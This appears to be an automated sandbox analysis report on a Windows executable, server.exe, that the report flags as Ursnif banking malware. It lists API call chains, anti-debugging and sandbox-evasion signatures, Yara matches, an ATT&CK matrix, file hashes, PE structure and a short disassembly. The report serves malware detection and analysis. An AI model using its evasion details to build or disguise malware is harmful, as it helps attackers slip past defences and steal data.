          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0040110B GetProcAddress,NtCreateSection,memset,0_2_0040110B
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401459 NtMapViewOfSection,0_2_00401459
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_047E421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_047E421F
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_047E8551 NtQueryVirtualMemory,0_2_047E8551
          Source: server.exeReversingLabs: Detection: 37%
          Source: server.exeVirustotal: Detection: 40%
          Source: server.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\server.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_047E30D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_047E30D5
          Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/0
          Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

          Data Obfuscation

          barindex
          Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_047E7F30 push ecx; ret 0_2_047E7F39
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_047E831B push ecx; ret 0_2_047E832B
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00414680 push ecx; mov dword ptr [esp], 00000004h0_2_00414681
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004146A0 push ecx; mov dword ptr [esp], 00000000h0_2_004146A1
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: Yara matchFile source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.server.exe.4e394a0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.server.exe.47e0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\server.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
          Source: C:\Users\user\Desktop\server.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
          Source: C:\Users\user\Desktop\server.exeAPI call chain: ExitProcess graph end node

          Anti Debugging

          barindex
          Source: C:\Users\user\Desktop\server.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000
          Source: C:\Users\user\Desktop\server.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
          Source: C:\Users\user\Desktop\server.exeCode function: __crtGetLocaleInfoA_stat,0_2_00411E1C
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_047E3BD3 cpuid 0_2_047E3BD3
          Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_00401D68
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_004015B0
          Source: C:\Users\user\Desktop\server.exeCode function: 0_2_047E3BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_047E3BD3

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.server.exe.4e394a0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.server.exe.47e0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.server.exe.4e394a0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.server.exe.47e0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Windows Management Instrumentation
          Path InterceptionPath Interception1
          Virtualization/Sandbox Evasion
          OS Credential Dumping1
          System Time Discovery
          Remote Services11
          Archive Collected Data
          Exfiltration Over Other Network Medium2
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          Data Encrypted for Impact
          Default Accounts12
          Native API
          Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Obfuscated Files or Information
          LSASS Memory1
          Security Software Discovery
          Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Non-Application Layer Protocol
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
          Software Packing
          Security Account Manager1
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
          Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
          Process Discovery
          Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
          Account Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
          System Owner/User Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          Remote System Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem124
          System Information Discovery
          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 834121 Sample: server.exe Startdate: 24/03/2023 Architecture: WINDOWS Score: 100 11 Malicious sample detected (through community Yara rule) 2->11 13 Multi AV Scanner detection for submitted file 2->13 15 Yara detected  Ursnif 2->15 17 Machine Learning detection for sample 2->17 5 server.exe 6 2->5         started        process3 dnsIp4 9 checklist.skype.com 5->9 19 Detected unpacking (changes PE section rights) 5->19 21 Detected unpacking (overwrites its own PE header) 5->21 23 Found evasive API chain (may stop execution after checking system information) 5->23 25 3 other signatures 5->25 signatures5

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          server.exe38%ReversingLabs
          server.exe41%VirustotalBrowse
          server.exe100%Joe Sandbox ML
          No Antivirus matches
          SourceDetectionScannerLabelLinkDownload
          0.2.server.exe.47e0000.2.unpack100%AviraHEUR/AGEN.1245293Download File
          0.2.server.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
          No Antivirus matches
          No Antivirus matches

          Download Network PCAP: filteredfull

          NameIPActiveMaliciousAntivirus DetectionReputation
          checklist.skype.com
          unknown
          unknownfalse
            high
            No contacted IP infos
            Joe Sandbox Version:37.0.0 Beryl
            Analysis ID:834121
            Start date and time:2023-03-24 14:00:16 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 5m 10s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:13
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample file name:server.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@1/0@1/0
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 52% (good quality ratio 50.5%)
            • Quality average: 82.1%
            • Quality standard deviation: 26.5%
            HCA Information:
            • Successful, ratio: 98%
            • Number of executed functions: 45
            • Number of non-executed functions: 31
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): fs.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            No simulations
            No context
            No context
            No context
            No context
            No context
            No created / dropped files found
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):6.713055854715817
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:server.exe
            File size:251904
            MD5:62c6ed30422b5876110ee6ab6660223e
            SHA1:60e1a1c26d35c9d90fb163364e3a4deec1d4016a
            SHA256:fbb595a285f1126d4bfe09240e40b1a8a66ac5024f90b5e64860bb872e05a248
            SHA512:a5d124845b49428c7ffca0b81c063b81acdc84ef8d67511e9cb68489cd3baf1b3dd8420aff3b5972c4702da8fcad90c5fc3b7483bed1c03f9223475fc9760ec1
            SSDEEP:3072:VRESzcarU/edI7cTsSsuDwTHDXbtMJzWVCkeoQ0LTZ2eB25UWNObVr:eRNILMbJeW92eBoUj
            TLSH:54347C1273E1F960F52686328E1EC7FD6A3EB8E1DE55BF6E17449A3F0870261C662314
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S...S...S...<...D...<.7.]...<.......Z.:.V...S...&...<...R...<.3.R...<.4.R...RichS...................PE..L......b...........
            Icon Hash:ba86124695b2aa92
            Entrypoint:0x404135
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:TERMINAL_SERVER_AWARE
            Time Stamp:0x62E0E386 [Wed Jul 27 07:04:38 2022 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:4fc712efe0d5d011b63626c597ebe2a6
            Instruction
            call 00007F770CC325D4h
            jmp 00007F770CC2DA4Eh
            mov edi, edi
            push ebp
            mov ebp, esp
            mov eax, dword ptr [ebp+08h]
            xor ecx, ecx
            cmp eax, dword ptr [00417008h+ecx*8]
            je 00007F770CC2DBD5h
            inc ecx
            cmp ecx, 2Dh
            jc 00007F770CC2DBB3h
            lea ecx, dword ptr [eax-13h]
            cmp ecx, 11h
            jnbe 00007F770CC2DBD0h
            push 0000000Dh
            pop eax
            pop ebp
            ret
            mov eax, dword ptr [0041700Ch+ecx*8]
            pop ebp
            ret
            add eax, FFFFFF44h
            push 0000000Eh
            pop ecx
            cmp ecx, eax
            sbb eax, eax
            and eax, ecx
            add eax, 08h
            pop ebp
            ret
            call 00007F770CC2E864h
            test eax, eax
            jne 00007F770CC2DBC8h
            mov eax, 00417170h
            ret
            add eax, 08h
            ret
            call 00007F770CC2E851h
            test eax, eax
            jne 00007F770CC2DBC8h
            mov eax, 00417174h
            ret
            add eax, 0Ch
            ret
            mov edi, edi
            push ebp
            mov ebp, esp
            push esi
            call 00007F770CC2DBA7h
            mov ecx, dword ptr [ebp+08h]
            push ecx
            mov dword ptr [eax], ecx
            call 00007F770CC2DB47h
            pop ecx
            mov esi, eax
            call 00007F770CC2DB81h
            mov dword ptr [eax], esi
            pop esi
            pop ebp
            ret
            mov edi, edi
            push ebp
            mov ebp, esp
            call 00007F770CC2E816h
            test eax, eax
            jne 00007F770CC2DBC7h
            push 0000000Ch
            pop eax
            pop ebp
            ret
            call 00007F770CC2DB64h
            mov ecx, dword ptr [ebp+08h]
            mov dword ptr [eax], ecx
            xor eax, eax
            pop ebp
            ret
            mov edi, edi
            push ebp
            mov ebp, esp
            push esi
            mov esi, dword ptr [ebp+08h]
            test esi, esi
            jne 00007F770CC2DBCCh
            call 00007F770CC2EDFAh
            Programming Language:
            • [C++] VS2010 build 30319
            • [ASM] VS2010 build 30319
            • [ C ] VS2010 build 30319
            • [IMP] VS2008 SP1 build 30729
            • [RES] VS2010 build 30319
            • [LNK] VS2010 build 30319
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x156a40x3c.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x27560000x15530.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x34f80x40.text
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x10000x1dc.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x1517c0x15200False0.5231139053254438data6.504969483391366IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .data0x170000x273e58c0x12c00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x27560000x155300x15600False0.37751279239766083data4.359745306091667IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountry
            BEKOJANIDURUPISO0x27688880xd96ASCII text, with very long lines (3478), with no line terminatorsSami LappishFinland
            BEKOJANIDURUPISO0x27688880xd96ASCII text, with very long lines (3478), with no line terminatorsSami LappishNorway
            BEKOJANIDURUPISO0x27688880xd96ASCII text, with very long lines (3478), with no line terminatorsSami LappishSweden
            RELOWAZUXOKU0x27696200x598ASCII text, with very long lines (1432), with no line terminatorsSami LappishFinland
            RELOWAZUXOKU0x27696200x598ASCII text, with very long lines (1432), with no line terminatorsSami LappishNorway
            RELOWAZUXOKU0x27696200x598ASCII text, with very long lines (1432), with no line terminatorsSami LappishSweden
            RT_ICON0x27568300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
            RT_ICON0x27568300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
            RT_ICON0x27568300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
            RT_ICON0x27570d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
            RT_ICON0x27570d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
            RT_ICON0x27570d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
            RT_ICON0x27581a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
            RT_ICON0x27581a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
            RT_ICON0x27581a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
            RT_ICON0x2758a500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
            RT_ICON0x2758a500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
            RT_ICON0x2758a500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
            RT_ICON0x275aff80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
            RT_ICON0x275aff80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
            RT_ICON0x275aff80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
            RT_ICON0x275c0d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSami LappishFinland
            RT_ICON0x275c0d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSami LappishNorway
            RT_ICON0x275c0d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSami LappishSweden
            RT_ICON0x275cf780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSami LappishFinland
            RT_ICON0x275cf780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSami LappishNorway
            RT_ICON0x275cf780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSami LappishSweden
            RT_ICON0x275d8200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSami LappishFinland
            RT_ICON0x275d8200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSami LappishNorway
            RT_ICON0x275d8200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSami LappishSweden
            RT_ICON0x275dee80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSami LappishFinland
            RT_ICON0x275dee80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSami LappishNorway
            RT_ICON0x275dee80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSami LappishSweden
            RT_ICON0x275e4500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600Sami LappishFinland
            RT_ICON0x275e4500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600Sami LappishNorway
            RT_ICON0x275e4500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600Sami LappishSweden
            RT_ICON0x27609f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224Sami LappishFinland
            RT_ICON0x27609f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224Sami LappishNorway
            RT_ICON0x27609f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224Sami LappishSweden
            RT_ICON0x2761aa00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400Sami LappishFinland
            RT_ICON0x2761aa00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400Sami LappishNorway
            RT_ICON0x2761aa00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400Sami LappishSweden
            RT_ICON0x27624280x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088Sami LappishFinland
            RT_ICON0x27624280x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088Sami LappishNorway
            RT_ICON0x27624280x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088Sami LappishSweden
            RT_ICON0x27629080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishFinland
            RT_ICON0x27629080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishNorway
            RT_ICON0x27629080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishSweden
            RT_ICON0x27637b00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishFinland
            RT_ICON0x27637b00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishNorway
            RT_ICON0x27637b00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishSweden
            RT_ICON0x2763e780x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishFinland
            RT_ICON0x2763e780x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishNorway
            RT_ICON0x2763e780x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishSweden
            RT_ICON0x27643e00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
            RT_ICON0x27643e00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
            RT_ICON0x27643e00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
            RT_ICON0x27669880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
            RT_ICON0x27669880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
            RT_ICON0x27669880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
            RT_ICON0x2767a300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishFinland
            RT_ICON0x2767a300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishNorway
            RT_ICON0x2767a300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishSweden
            RT_ICON0x27683b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishFinland
            RT_ICON0x27683b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishNorway
            RT_ICON0x27683b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishSweden
            RT_STRING0x2769ff00x4d6dataSami LappishFinland
            RT_STRING0x2769ff00x4d6dataSami LappishNorway
            RT_STRING0x2769ff00x4d6dataSami LappishSweden
            RT_STRING0x276a4c80x4b0dataSami LappishFinland
            RT_STRING0x276a4c80x4b0dataSami LappishNorway
            RT_STRING0x276a4c80x4b0dataSami LappishSweden
            RT_STRING0x276a9780x588dataSami LappishFinland
            RT_STRING0x276a9780x588dataSami LappishNorway
            RT_STRING0x276a9780x588dataSami LappishSweden
            RT_STRING0x276af000x5d2dataSami LappishFinland
            RT_STRING0x276af000x5d2dataSami LappishNorway
            RT_STRING0x276af000x5d2dataSami LappishSweden
            RT_STRING0x276b4d80x58dataSami LappishFinland
            RT_STRING0x276b4d80x58dataSami LappishNorway
            RT_STRING0x276b4d80x58dataSami LappishSweden
            RT_ACCELERATOR0x2769c600x78dataSami LappishFinland
            RT_ACCELERATOR0x2769c600x78dataSami LappishNorway
            RT_ACCELERATOR0x2769c600x78dataSami LappishSweden
            RT_ACCELERATOR0x2769bb80xa8dataSami LappishFinland
            RT_ACCELERATOR0x2769bb80xa8dataSami LappishNorway
            RT_ACCELERATOR0x2769bb80xa8dataSami LappishSweden
            RT_GROUP_ICON0x275c0a00x30dataSami LappishFinland
            RT_GROUP_ICON0x275c0a00x30dataSami LappishNorway
            RT_GROUP_ICON0x275c0a00x30dataSami LappishSweden
            RT_GROUP_ICON0x27581800x22dataSami LappishFinland
            RT_GROUP_ICON0x27581800x22dataSami LappishNorway
